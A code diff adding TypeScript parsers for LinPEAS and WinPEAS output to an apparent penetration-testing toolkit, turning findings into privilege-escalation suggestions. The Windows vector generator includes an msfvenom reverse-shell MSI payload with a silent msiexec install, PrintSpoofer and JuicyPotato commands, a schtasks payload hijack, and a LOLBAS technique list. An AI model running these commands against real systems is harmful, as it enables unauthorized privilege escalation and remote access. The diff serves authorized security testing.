+      vectors.push({
+        category: "writeable_files",
+        platform: "linux",
+        name: `Writable ${file.path}`,
+        description: `Critical writable file: ${file.path}`,
+        risk: "critical",
+        exploitability: "easy",
+        target: file.path,
+        technique: "File modification",
+        commands: [`# Modify ${file.path} to gain access`],
+        prerequisites: [],
+        detectionRisk: "high",
+        mitre: [PostExploitTypes.MITRE_PRIVESC.ABUSE_ELEVATION],
+      })
+    }
+
+    // Container escape vectors
+    if (containerInfo) {
+      for (const escape of containerInfo.escapeVectors) {
+        vectors.push({
+          category: "container_escape",
+          platform: "linux",
+          name: `Container escape: ${containerInfo.type}`,
+          description: escape,
+          risk: "critical",
+          exploitability: containerInfo.privileged ? "easy" : "moderate",
+          target: containerInfo.type,
+          technique: "Container escape",
+          commands: [`# ${escape}`],
+          prerequisites: [],
+          detectionRisk: "high",
+          mitre: [PostExploitTypes.MITRE_PRIVESC.CONTAINER_ESCAPE],
+        })
+      }
+    }
+
+    return vectors
+  }
+
+  /**
+   * Parse LinPEAS output.
+   */
+  export function parse(content: string): ParsedResult {
+    // Strip colors for easier parsing
+    const cleanContent = stripColors(content)
+
+    const suidBinaries = parseSUIDBinaries(cleanContent)
+    const capabilities = parseCapabilities(cleanContent)
+    const sudoEntries = parseSudoEntries(cleanContent)
+    const cronJobs = parseCronJobs(cleanContent)
+    const writableFiles = parseWritableFiles(cleanContent)
+    const passwords = parsePasswords(cleanContent)
+    const systemInfo = parseSystemInfo(cleanContent)
+    const networkInfo = parseNetworkInfo(cleanContent)
+    const containerInfo = parseContainerInfo(cleanContent)
+
+    const privescVectors = generatePrivescVectors(
+      suidBinaries,
+      capabilities,
+      sudoEntries,
+      cronJobs,
+      writableFiles,
+      containerInfo
+    )
+
+    // Calculate summary
+    const criticalFindings = suidBinaries.filter(s => s.exploitable).length +
+      sudoEntries.filter(s => s.exploitable && s.nopasswd).length +
+      writableFiles.filter(f => f.significance === "critical").length +
+      (containerInfo?.privileged ? 1 : 0)
+
+    const highFindings = capabilities.filter(c => c.exploitable).length +
+      sudoEntries.filter(s => s.exploitable && !s.nopasswd).length +
+      cronJobs.filter(c => c.writable).length
+
+    const mediumFindings = writableFiles.filter(f => f.significance === "high").length +
+      passwords.length
+
+    const lowFindings = suidBinaries.filter(s => !s.exploitable).length +
+      writableFiles.filter(f => f.significance === "medium" || f.significance === "low").length
+
+    return {
+      systemInfo,
+      suidBinaries,
+      capabilities,
+      writableFiles,
+      cronJobs,
+      passwords,
+      sudoEntries,
+      interestingFiles: [],
+      networkInfo,
+      containerInfo,
+      privescVectors,
+      summary: {
+        totalFindings: criticalFindings + highFindings + mediumFindings + lowFindings,
+        criticalFindings,
+        highFindings,
+        mediumFindings,
+        lowFindings,
+        privescVectorCount: privescVectors.length,
+      },
+    }
+  }
+
+  /**
+   * Format parsed results for display.
+   */
+  export function formatResults(result: ParsedResult): string {
+    const lines: string[] = []
+
+    lines.push("LINPEAS PARSE RESULTS")
+    lines.push("=====================")
+    lines.push("")
+
+    // Summary
+    lines.push("[SUMMARY]")
+    lines.push(`  Total Findings: ${result.summary.totalFindings}`)
+    lines.push(`  Critical: ${result.summary.criticalFindings}`)
+    lines.push(`  High: ${result.summary.highFindings}`)
+    lines.push(`  Medium: ${result.summary.mediumFindings}`)
+    lines.push(`  Low: ${result.summary.lowFindings}`)
+    lines.push(`  Privesc Vectors: ${result.summary.privescVectorCount}`)
+    lines.push("")
+
+    // System Info
+    if (result.systemInfo.hostname || result.systemInfo.kernel) {
+      lines.push("[SYSTEM INFO]")
+      if (result.systemInfo.hostname) lines.push(`  Hostname: ${result.systemInfo.hostname}`)
+      if (result.systemInfo.kernel) lines.push(`  Kernel: ${result.systemInfo.kernel}`)
+      if (result.systemInfo.distribution) lines.push(`  Distribution: ${result.systemInfo.distribution}`)
+      lines.push("")
+    }
+
+    // Exploitable SUID
+    const exploitableSuid = result.suidBinaries.filter(s => s.exploitable)
+    if (exploitableSuid.length > 0) {
+      lines.push("[EXPLOITABLE SUID BINARIES]")
+      for (const suid of exploitableSuid) {
+        lines.push(`  [!] ${suid.path}`)
+        lines.push(`      Technique: ${suid.technique}`)
+        if (suid.gtfobins) lines.push(`      GTFOBins: ${suid.gtfobins}`)
+      }
+      lines.push("")
+    }
+
+    // Exploitable Capabilities
+    const exploitableCaps = result.capabilities.filter(c => c.exploitable)
+    if (exploitableCaps.length > 0) {
+      lines.push("[EXPLOITABLE CAPABILITIES]")
+      for (const cap of exploitableCaps) {
+        lines.push(`  [!] ${cap.path}`)
+        lines.push(`      Capabilities: ${cap.capabilities.join(", ")}`)
+      }
+      lines.push("")
+    }
+
+    // Exploitable Sudo
+    const exploitableSudo = result.sudoEntries.filter(s => s.exploitable)
+    if (exploitableSudo.length > 0) {
+      lines.push("[EXPLOITABLE SUDO ENTRIES]")
+      for (const sudo of exploitableSudo) {
+        const nopasswd = sudo.nopasswd ? " (NOPASSWD)" : ""
+        lines.push(`  [!] ${sudo.user} -> (${sudo.runas}) ${sudo.commands}${nopasswd}`)
+      }
+      lines.push("")
+    }
+
+    // Password Findings
+    if (result.passwords.length > 0) {
+      lines.push("[PASSWORD FINDINGS]")
+      for (const pwd of result.passwords.slice(0, 10)) {
+        lines.push(`  [*] ${pwd.type}: ${pwd.content.substring(0, 50)}...`)
+        lines.push(`      Source: ${pwd.source}`)
+      }
+      if (result.passwords.length > 10) {
+        lines.push(`  ... and ${result.passwords.length - 10} more`)
+      }
+      lines.push("")
+    }
+
+    // Container Info
+    if (result.containerInfo) {
+      lines.push("[CONTAINER DETECTION]")
+      lines.push(`  Type: ${result.containerInfo.type}`)
+      lines.push(`  Privileged: ${result.containerInfo.privileged}`)
+      if (result.containerInfo.escapeVectors.length > 0) {
+        lines.push("  Escape Vectors:")
+        for (const escape of result.containerInfo.escapeVectors) {
+          lines.push(`    [!] ${escape}`)
+        }
+      }
+      lines.push("")
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/parsers/winpeas.ts b/packages/opencode/src/pentest/postexploit/parsers/winpeas.ts
new file mode 100644
index 00000000000..51cec162c57
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/parsers/winpeas.ts
@@ -0,0 +1,836 @@
+/**
+ * @fileoverview WinPEAS Output Parser
+ *
+ * Parses WinPEAS output to extract privilege escalation vectors,
+ * credentials, and other security findings.
+ *
+ * @module pentest/postexploit/parsers/winpeas
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * WinPEAS parser namespace.
+ */
+export namespace WinPEASParser {
+  /**
+   * WinPEAS section markers.
+   */
+  const SECTION_MARKERS = {
+    SYSTEM_INFO: /═+.*System Information.*═+/i,
+    USERS: /═+.*Users Information.*═+/i,
+    PROCESSES: /═+.*Processes Information.*═+/i,
+    SERVICES: /═+.*Services Information.*═+/i,
+    APPLICATIONS: /═+.*Applications Information.*═+/i,
+    NETWORK: /═+.*Network Information.*═+/i,
+    WINDOWS_CREDENTIALS: /═+.*Windows Credentials.*═+/i,
+    BROWSER_CREDENTIALS: /═+.*Browser.*═+/i,
+    INTERESTING_FILES: /═+.*Interesting.*Files.*═+/i,
+    EVENTS: /═+.*Events.*═+/i,
+    DPAPI: /═+.*DPAPI.*═+/i,
+    SCHEDULED_TASKS: /═+.*Scheduled.*Tasks.*═+/i,
+    REGISTRY: /═+.*Registry.*═+/i,
+  }
+
+  /**
+   * Known LOLBAS binaries for Windows.
+   */
+  const LOLBAS_BINARIES: Record<string, { lolbas: string; technique: string }> = {
+    "mshta.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Mshta/", technique: "Execute HTA files" },
+    "msiexec.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/", technique: "Install malicious MSI" },
+    "regsvr32.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/", technique: "Execute scriptlets" },
+    "rundll32.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Rundll32/", technique: "Execute DLLs" },
+    "certutil.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", technique: "Download and decode files" },
+    "bitsadmin.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", technique: "Download files" },
+    "wmic.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", technique: "Execute XSL scripts" },
+    "cscript.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Cscript/", technique: "Execute VBS/JS" },
+    "wscript.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Wscript/", technique: "Execute VBS/JS" },
+    "powershell.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Powershell/", technique: "Execute scripts" },
+    "cmd.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Cmd/", technique: "Execute commands" },
+    "forfiles.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", technique: "Execute commands" },
+    "pcalua.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/", technique: "Execute programs" },
+    "syncappvpublishingserver.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", technique: "Execute PowerShell" },
+    "control.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Control/", technique: "Execute DLLs" },
+    "installutil.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Installutil/", technique: "Execute assemblies" },
+    "msbuild.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Msbuild/", technique: "Execute inline tasks" },
+    "cmstp.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", technique: "Execute INF scripts" },
+    "dnscmd.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", technique: "Execute DLLs (requires DNS server)" },
+    "ftp.exe": { lolbas: "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", technique: "Execute commands" },
+  }
+
+  /**
+   * Parsed WinPEAS result structure.
+   */
+  export interface ParsedResult {
+    systemInfo: SystemInfo
+    services: ServiceEntry[]
+    scheduledTasks: ScheduledTask[]
+    registryFindings: RegistryFinding[]
+    credentials: CredentialFinding[]
+    unquotedPaths: UnquotedPath[]
+    dllHijacking: DLLHijackingVector[]
+    tokenPrivileges: TokenPrivilege[]
+    interestingFiles: InterestingFile[]
+    networkInfo: NetworkInfo
+    privescVectors: Omit<PostExploitTypes.PrivescVector, "id" | "discoveredAt">[]
+    summary: ParseSummary
+  }
+
+  export interface SystemInfo {
+    hostname?: string
+    osVersion?: string
+    architecture?: string
+    domain?: string
+    currentUser?: string
+    isAdmin: boolean
+    uacEnabled: boolean
+    amsi?: string
+  }
+
+  export interface ServiceEntry {
+    name: string
+    displayName: string
+    path: string
+    startType: string
+    state: string
+    permissions: string[]
+    unquotedPath: boolean
+    modifiablePath: boolean
+    modifiableBinary: boolean
+  }
+
+  export interface ScheduledTask {
+    name: string
+    path: string
+    state: string
+    lastRun?: string
+    nextRun?: string
+    runsAs: string
+    command?: string
+    writable: boolean
+  }
+
+  export interface RegistryFinding {
+    key: string
+    value: string
+    type: "autorun" | "alwaysinstallelevated" | "credential" | "interesting"
+    significance: "critical" | "high" | "medium" | "low"
+  }
+
+  export interface CredentialFinding {
+    source: string
+    type: "cleartext" | "hash" | "dpapi" | "browser" | "vault" | "cached"
+    username?: string
+    content: string
+    context?: string
+  }
+
+  export interface UnquotedPath {
+    service: string
+    path: string
+    writableSegments: string[]
+    exploitable: boolean
+  }
+
+  export interface DLLHijackingVector {
+    application: string
+    missingDLL: string
+    searchPath: string
+    writablePath: boolean
+  }
+
+  export interface TokenPrivilege {
+    privilege: string
+    enabled: boolean
+    exploitable: boolean
+    technique?: string
+  }
+
+  export interface InterestingFile {
+    path: string
+    type: string
+    reason: string
+  }
+
+  export interface NetworkInfo {
+    interfaces: string[]
+    listeningPorts: { port: number; process: string }[]
+    firewallStatus: string
+    connections: string[]
+  }
+
+  export interface ParseSummary {
+    totalFindings: number
+    criticalFindings: number
+    highFindings: number
+    mediumFindings: number
+    lowFindings: number
+    privescVectorCount: number
+  }
+
+  /**
+   * Strip ANSI color codes from text.
+   */
+  export function stripColors(text: string): string {
+    return text.replace(/\x1b\[[0-9;]*m/g, "")
+  }
+
+  /**
+   * Extract section content between markers.
+   */
+  function extractSection(content: string, startPattern: RegExp): string {
+    const lines = content.split("\n")
+    let capturing = false
+    const sectionLines: string[] = []
+
+    for (const line of lines) {
+      if (startPattern.test(line)) {
+        capturing = true
+        continue
+      }
+
+      if (capturing) {
+        if (/═{10,}/.test(line) && !startPattern.test(line)) {
+          break
+        }
+        sectionLines.push(line)
+      }
+    }
+
+    return sectionLines.join("\n")
+  }
+
+  /**
+   * Parse system information from WinPEAS output.
+   */
+  function parseSystemInfo(content: string): SystemInfo {
+    const section = extractSection(content, SECTION_MARKERS.SYSTEM_INFO)
+
+    const hostnameMatch = section.match(/Hostname:\s*(\S+)/i) || content.match(/Computer Name:\s*(\S+)/i)
+    const osMatch = section.match(/OS Version:\s*(.+)/i) || content.match(/Windows\s+([\d.]+|Server\s+\d+)/i)
+    const archMatch = section.match(/(x64|x86|ARM64)/i)
+    const domainMatch = section.match(/Domain:\s*(\S+)/i)
+    const userMatch = section.match(/Current User:\s*(\S+)/i) || content.match(/UserName\s*:\s*(\S+)/i)
+    const adminMatch = section.match(/(?:Admin|Administrator).*?:\s*(Yes|True|1)/i)
+    const uacMatch = section.match(/UAC.*?:\s*(Enabled|Yes|True)/i)
+
+    return {
+      hostname: hostnameMatch?.[1],
+      osVersion: osMatch?.[1],
+      architecture: archMatch?.[1],
+      domain: domainMatch?.[1],
+      currentUser: userMatch?.[1],
+      isAdmin: !!adminMatch,
+      uacEnabled: !!uacMatch,
+    }
+  }
+
+  /**
+   * Parse services from WinPEAS output.
+   */
+  function parseServices(content: string): ServiceEntry[] {
+    const section = extractSection(content, SECTION_MARKERS.SERVICES)
+    const services: ServiceEntry[] = []
+
+    // Pattern for service entries
+    const serviceBlocks = section.split(/(?=Name\s*:|Service\s*:)/i)
+
+    for (const block of serviceBlocks) {
+      if (block.trim().length < 10) continue
+
+      const nameMatch = block.match(/(?:Name|Service)\s*:\s*(\S+)/i)
+      const displayMatch = block.match(/DisplayName\s*:\s*(.+)/i)
+      const pathMatch = block.match(/(?:ImagePath|BinaryPath|Path)\s*:\s*(.+)/i)
+      const startMatch = block.match(/StartMode\s*:\s*(\S+)/i)
+      const stateMatch = block.match(/State\s*:\s*(\S+)/i)
+
+      if (nameMatch && pathMatch) {
+        const path = pathMatch[1].trim()
+        const unquotedPath = path.includes(" ") && !path.startsWith("\"") && !path.startsWith("'")
+        const modifiablePath = block.toLowerCase().includes("modifiable") ||
+          block.toLowerCase().includes("writable") ||
+          block.toLowerCase().includes("everyone")
+
+        services.push({
+          name: nameMatch[1],
+          displayName: displayMatch?.[1]?.trim() || nameMatch[1],
+          path,
+          startType: startMatch?.[1] || "Unknown",
+          state: stateMatch?.[1] || "Unknown",
+          permissions: [],
+          unquotedPath,
+          modifiablePath,
+          modifiableBinary: modifiablePath,
+        })
+      }
+    }
+
+    return services
+  }
+
+  /**
+   * Parse scheduled tasks from WinPEAS output.
+   */
+  function parseScheduledTasks(content: string): ScheduledTask[] {
+    const section = extractSection(content, SECTION_MARKERS.SCHEDULED_TASKS)
+    const tasks: ScheduledTask[] = []
+
+    const taskBlocks = section.split(/(?=TaskName\s*:|Task\s*:)/i)
+
+    for (const block of taskBlocks) {
+      if (block.trim().length < 10) continue
+
+      const nameMatch = block.match(/(?:TaskName|Task)\s*:\s*(.+)/i)
+      const pathMatch = block.match(/(?:Task To Run|Command)\s*:\s*(.+)/i)
+      const stateMatch = block.match(/State\s*:\s*(\S+)/i) || block.match(/Status\s*:\s*(\S+)/i)
+      const runAsMatch = block.match(/(?:Run As User|Author)\s*:\s*(\S+)/i)
+
+      if (nameMatch) {
+        const writable = block.toLowerCase().includes("writable") ||
+          block.toLowerCase().includes("modifiable")
+
+        tasks.push({
+          name: nameMatch[1].trim(),
+          path: pathMatch?.[1]?.trim() || "",
+          state: stateMatch?.[1] || "Unknown",
+          runsAs: runAsMatch?.[1] || "Unknown",
+          command: pathMatch?.[1]?.trim(),
+          writable,
+        })
+      }
+    }
+
+    return tasks
+  }
+
+  /**
+   * Parse registry findings from WinPEAS output.
+   */
+  function parseRegistryFindings(content: string): RegistryFinding[] {
+    const section = extractSection(content, SECTION_MARKERS.REGISTRY)
+    const findings: RegistryFinding[] = []
+
+    // Check for AlwaysInstallElevated
+    if (content.toLowerCase().includes("alwaysinstallelevated") &&
+        (content.includes("1") || content.toLowerCase().includes("enabled"))) {
+      findings.push({
+        key: "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated",
+        value: "1",
+        type: "alwaysinstallelevated",
+        significance: "critical",
+      })
+      findings.push({
+        key: "HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated",
+        value: "1",
+        type: "alwaysinstallelevated",
+        significance: "critical",
+      })
+    }
+
+    // Check for AutoRun entries
+    const autorunPattern = /(?:Run|RunOnce).*?:\s*(.+)/gi
+    let match
+    while ((match = autorunPattern.exec(content)) !== null) {
+      findings.push({
+        key: match[0],
+        value: match[1],
+        type: "autorun",
+        significance: "medium",
+      })
+    }
+
+    // Check for credentials in registry
+    const credPatterns = [
+      /password\s*[=:]\s*['"]?([^'";\s]{3,})/gi,
+      /DefaultPassword\s*[=:]\s*(\S+)/gi,
+      /VNCPassword\s*[=:]\s*(\S+)/gi,
+    ]
+
+    for (const pattern of credPatterns) {
+      while ((match = pattern.exec(section)) !== null) {
+        findings.push({
+          key: "Registry",
+          value: match[1],
+          type: "credential",
+          significance: "high",
+        })
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Parse credentials from WinPEAS output.
+   */
+  function parseCredentials(content: string): CredentialFinding[] {
+    const credentials: CredentialFinding[] = []
+
+    // Windows Credentials section
+    const winCredSection = extractSection(content, SECTION_MARKERS.WINDOWS_CREDENTIALS)
+
+    // Look for cached credentials
+    const cachedPattern = /(?:Target|Generic)\s*:\s*(\S+).*?(?:User|UserName)\s*:\s*(\S+)/gis
+    let match
+    while ((match = cachedPattern.exec(winCredSection)) !== null) {
+      credentials.push({
+        source: "Windows Credential Manager",
+        type: "cached",
+        username: match[2],
+        content: `Target: ${match[1]}`,
+      })
+    }
+
+    // DPAPI section
+    const dpapiSection = extractSection(content, SECTION_MARKERS.DPAPI)
+    if (dpapiSection.includes("masterkey") || dpapiSection.includes("MasterKey")) {
+      const masterkeyPattern = /([a-f0-9-]{36})/gi
+      while ((match = masterkeyPattern.exec(dpapiSection)) !== null) {
+        credentials.push({
+          source: "DPAPI",
+          type: "dpapi",
+          content: `MasterKey GUID: ${match[1]}`,
+        })
+      }
+    }
+
+    // Browser credentials section
+    const browserSection = extractSection(content, SECTION_MARKERS.BROWSER_CREDENTIALS)
+    const browserCredsPattern = /URL\s*:\s*(\S+).*?Username\s*:\s*(\S+)/gis
+    while ((match = browserCredsPattern.exec(browserSection)) !== null) {
+      credentials.push({
+        source: "Browser",
+        type: "browser",
+        username: match[2],
+        content: `URL: ${match[1]}`,
+      })
+    }
+
+    // Look for SAM/SYSTEM backup files
+    if (content.includes("SAM") && content.includes("backup")) {
+      credentials.push({
+        source: "SAM Backup",
+        type: "hash",
+        content: "SAM backup file found - may contain password hashes",
+      })
+    }
+
+    // Look for unattended install files
+    const unattendedPatterns = [
+      /unattend\.xml/i,
+      /sysprep\.xml/i,
+      /sysprep\.inf/i,
+    ]
+
+    for (const pattern of unattendedPatterns) {
+      if (pattern.test(content)) {
+        credentials.push({
+          source: "Unattended Install",
+          type: "cleartext",
+          content: "Unattended installation file found - may contain passwords",
+        })
+      }
+    }
+
+    return credentials
+  }
+
+  /**
+   * Parse unquoted service paths from WinPEAS output.
+   */
+  function parseUnquotedPaths(services: ServiceEntry[]): UnquotedPath[] {
+    const unquoted: UnquotedPath[] = []
+
+    for (const service of services.filter(s => s.unquotedPath)) {
+      const path = service.path
+      const segments: string[] = []
+
+      // Find potential hijack points in unquoted path
+      // Example: C:\Program Files\Some App\service.exe
+      // Could be hijacked at: C:\Program.exe, C:\Program Files\Some.exe
+      const parts = path.split("\\")
+      let currentPath = ""
+
+      for (let i = 0; i < parts.length - 1; i++) {
+        currentPath += parts[i]
+        if (parts[i].includes(" ")) {
+          const hijackPoint = currentPath.split(" ")[0] + ".exe"
+          segments.push(hijackPoint)
+        }
+        currentPath += "\\"
+      }
+
+      if (segments.length > 0) {
+        unquoted.push({
+          service: service.name,
+          path: service.path,
+          writableSegments: segments,
+          exploitable: segments.length > 0 && service.modifiablePath,
+        })
+      }
+    }
+
+    return unquoted
+  }
+
+  /**
+   * Parse token privileges from WinPEAS output.
+   */
+  function parseTokenPrivileges(content: string): TokenPrivilege[] {
+    const privileges: TokenPrivilege[] = []
+
+    const exploitablePrivileges: Record<string, string> = {
+      SeImpersonatePrivilege: "Potato attacks (JuicyPotato, PrintSpoofer, etc.)",
+      SeAssignPrimaryTokenPrivilege: "Token manipulation",
+      SeTcbPrivilege: "Act as part of operating system",
+      SeBackupPrivilege: "Read any file (backup)",
+      SeRestorePrivilege: "Write any file (restore)",
+      SeCreateTokenPrivilege: "Create arbitrary tokens",
+      SeLoadDriverPrivilege: "Load kernel drivers",
+      SeTakeOwnershipPrivilege: "Take ownership of objects",
+      SeDebugPrivilege: "Debug processes, access LSASS",
+    }
+
+    const privPattern = /(Se\w+Privilege)\s*.*?(Enabled|Disabled)/gi
+    let match
+
+    while ((match = privPattern.exec(content)) !== null) {
+      const privilege = match[1]
+      const enabled = match[2].toLowerCase() === "enabled"
+      const technique = exploitablePrivileges[privilege]
+
+      privileges.push({
+        privilege,
+        enabled,
+        exploitable: !!technique && enabled,
+        technique,
+      })
+    }
+
+    return privileges
+  }
+
+  /**
+   * Parse network information from WinPEAS output.
+   */
+  function parseNetworkInfo(content: string): NetworkInfo {
+    const section = extractSection(content, SECTION_MARKERS.NETWORK)
+
+    const interfaces: string[] = []
+    const ifacePattern = /(?:Ethernet|WiFi|Wireless)\s*adapter\s*([^:]+)/gi
+    let match
+    while ((match = ifacePattern.exec(section)) !== null) {
+      interfaces.push(match[1].trim())
+    }
+
+    const listeningPorts: { port: number; process: string }[] = []
+    const portPattern = /(?:TCP|UDP)\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)/gi
+    while ((match = portPattern.exec(section)) !== null) {
+      listeningPorts.push({
+        port: parseInt(match[1], 10),
+        process: match[2],
+      })
+    }
+
+    const firewallMatch = section.match(/Firewall.*?:\s*(Enabled|Disabled|On|Off)/i)
+
+    return {
+      interfaces,
+      listeningPorts,
+      firewallStatus: firewallMatch?.[1] || "Unknown",
+      connections: [],
+    }
+  }
+
+  /**
+   * Convert findings to privesc vectors.
+   */
+  function generatePrivescVectors(
+    services: ServiceEntry[],
+    tasks: ScheduledTask[],
+    registryFindings: RegistryFinding[],
+    unquotedPaths: UnquotedPath[],
+    tokenPrivileges: TokenPrivilege[]
+  ): Omit<PostExploitTypes.PrivescVector, "id" | "discoveredAt">[] {
+    const vectors: Omit<PostExploitTypes.PrivescVector, "id" | "discoveredAt">[] = []
+
+    // Service vectors - unquoted paths
+    for (const unquoted of unquotedPaths.filter(u => u.exploitable)) {
+      vectors.push({
+        category: "unquoted_path",
+        platform: "windows",
+        name: `Unquoted service path: ${unquoted.service}`,
+        description: `Service ${unquoted.service} has an unquoted path: ${unquoted.path}`,
+        risk: "high",
+        exploitability: "moderate",
+        target: unquoted.service,
+        technique: "Unquoted service path exploitation",
+        commands: [
+          `# Place executable at one of these paths:`,
+          ...unquoted.writableSegments.map(s => `# ${s}`),
+          `# Then restart service: sc stop ${unquoted.service} && sc start ${unquoted.service}`,
+        ],
+        prerequisites: [],
+        detectionRisk: "medium",
+        lolbas: "https://lolbas-project.github.io/",
+        mitre: [PostExploitTypes.MITRE_PRIVESC.PATH_INTERCEPTION],
+      })
+    }
+
+    // Service vectors - modifiable binaries
+    for (const service of services.filter(s => s.modifiableBinary && !s.unquotedPath)) {
+      vectors.push({
+        category: "service",
+        platform: "windows",
+        name: `Modifiable service binary: ${service.name}`,
+        description: `Service binary is writable: ${service.path}`,
+        risk: "critical",
+        exploitability: "easy",
+        target: service.name,
+        technique: "Service binary replacement",
+        commands: [
+          `# Replace ${service.path} with malicious binary`,
+          `# Restart service: sc stop ${service.name} && sc start ${service.name}`,
+        ],
+        prerequisites: [],
+        detectionRisk: "high",
+        mitre: [PostExploitTypes.MITRE_PRIVESC.FILE_PERMISSIONS],
+      })
+    }
+
+    // AlwaysInstallElevated
+    const alwaysElevated = registryFindings.filter(r => r.type === "alwaysinstallelevated")
+    if (alwaysElevated.length >= 2) {
+      vectors.push({
+        category: "always_install_elevated",
+        platform: "windows",
+        name: "AlwaysInstallElevated",
+        description: "AlwaysInstallElevated is enabled - MSI files run with SYSTEM privileges",
+        risk: "critical",
+        exploitability: "trivial",
+        target: "MSI installation",
+        technique: "Malicious MSI installation",
+        commands: [
+          `msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > evil.msi`,
+          `msiexec /quiet /qn /i evil.msi`,
+        ],
+        prerequisites: [],
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PRIVESC.ABUSE_ELEVATION],
+      })
+    }
+
+    // Scheduled task vectors
+    for (const task of tasks.filter(t => t.writable && t.runsAs.toLowerCase().includes("system"))) {
+      vectors.push({
+        category: "scheduled_task",
+        platform: "windows",
+        name: `Writable scheduled task: ${task.name}`,
+        description: `Scheduled task runs as ${task.runsAs} and is writable`,
+        risk: "critical",
+        exploitability: "easy",
+        target: task.name,
+        technique: "Scheduled task hijacking",
+        commands: [
+          `# Modify task command: ${task.command}`,
+          `schtasks /change /tn "${task.name}" /tr "C:\\path\\to\\payload.exe"`,
+        ],
+        prerequisites: [],
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PRIVESC.SCHEDULED_TASK],
+      })
+    }
+
+    // Token privilege vectors
+    for (const priv of tokenPrivileges.filter(p => p.exploitable)) {
+      vectors.push({
+        category: "token",
+        platform: "windows",
+        name: `Token: ${priv.privilege}`,
+        description: `Exploitable token privilege: ${priv.privilege}`,
+        risk: "critical",
+        exploitability: priv.privilege === "SeImpersonatePrivilege" ? "easy" : "moderate",
+        target: priv.privilege,
+        technique: priv.technique || "Token manipulation",
+        commands: priv.privilege === "SeImpersonatePrivilege"
+          ? [
+              `# Use JuicyPotato, PrintSpoofer, or RoguePotato`,
+              `PrintSpoofer.exe -i -c "cmd.exe"`,
+              `JuicyPotato.exe -l 1337 -p c:\\windows\\system32\\cmd.exe -t *`,
+            ]
+          : [`# Exploit ${priv.privilege} - see technique documentation`],
+        prerequisites: [],
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PRIVESC.TOKEN_MANIPULATION],
+      })
+    }
+
+    return vectors
+  }
+
+  /**
+   * Parse WinPEAS output.
+   */
+  export function parse(content: string): ParsedResult {
+    const cleanContent = stripColors(content)
+
+    const systemInfo = parseSystemInfo(cleanContent)
+    const services = parseServices(cleanContent)
+    const scheduledTasks = parseScheduledTasks(cleanContent)
+    const registryFindings = parseRegistryFindings(cleanContent)
+    const credentials = parseCredentials(cleanContent)
+    const unquotedPaths = parseUnquotedPaths(services)
+    const tokenPrivileges = parseTokenPrivileges(cleanContent)
+    const networkInfo = parseNetworkInfo(cleanContent)
+
+    const privescVectors = generatePrivescVectors(
+      services,
+      scheduledTasks,
+      registryFindings,
+      unquotedPaths,
+      tokenPrivileges
+    )
+
+    // Calculate summary
+    const criticalFindings =
+      registryFindings.filter(r => r.significance === "critical").length +
+      tokenPrivileges.filter(p => p.exploitable && p.privilege === "SeImpersonatePrivilege").length +
+      services.filter(s => s.modifiableBinary).length
+
+    const highFindings =
+      unquotedPaths.filter(u => u.exploitable).length +
+      scheduledTasks.filter(t => t.writable).length +
+      tokenPrivileges.filter(p => p.exploitable && p.privilege !== "SeImpersonatePrivilege").length +
+      registryFindings.filter(r => r.significance === "high").length
+
+    const mediumFindings =
+      credentials.length +
+      registryFindings.filter(r => r.significance === "medium").length
+
+    const lowFindings =
+      services.filter(s => s.unquotedPath && !s.modifiablePath).length +
+      registryFindings.filter(r => r.significance === "low").length
+
+    return {
+      systemInfo,
+      services,
+      scheduledTasks,
+      registryFindings,
+      credentials,
+      unquotedPaths,
+      dllHijacking: [],
+      tokenPrivileges,
+      interestingFiles: [],
+      networkInfo,
+      privescVectors,
+      summary: {
+        totalFindings: criticalFindings + highFindings + mediumFindings + lowFindings,
+        criticalFindings,
+        highFindings,
+        mediumFindings,
+        lowFindings,
+        privescVectorCount: privescVectors.length,
+      },
+    }
+  }
+
+  /**
+   * Format parsed results for display.
+   */
+  export function formatResults(result: ParsedResult): string {
+    const lines: string[] = []
+
+    lines.push("WINPEAS PARSE RESULTS")
+    lines.push("=====================")
+    lines.push("")
+
+    // Summary
+    lines.push("[SUMMARY]")
+    lines.push(`  Total Findings: ${result.summary.totalFindings}`)
+    lines.push(`  Critical: ${result.summary.criticalFindings}`)
+    lines.push(`  High: ${result.summary.highFindings}`)
+    lines.push(`  Medium: ${result.summary.mediumFindings}`)
+    lines.push(`  Low: ${result.summary.lowFindings}`)
+    lines.push(`  Privesc Vectors: ${result.summary.privescVectorCount}`)
+    lines.push("")
+
+    // System Info
+    lines.push("[SYSTEM INFO]")
+    if (result.systemInfo.hostname) lines.push(`  Hostname: ${result.systemInfo.hostname}`)
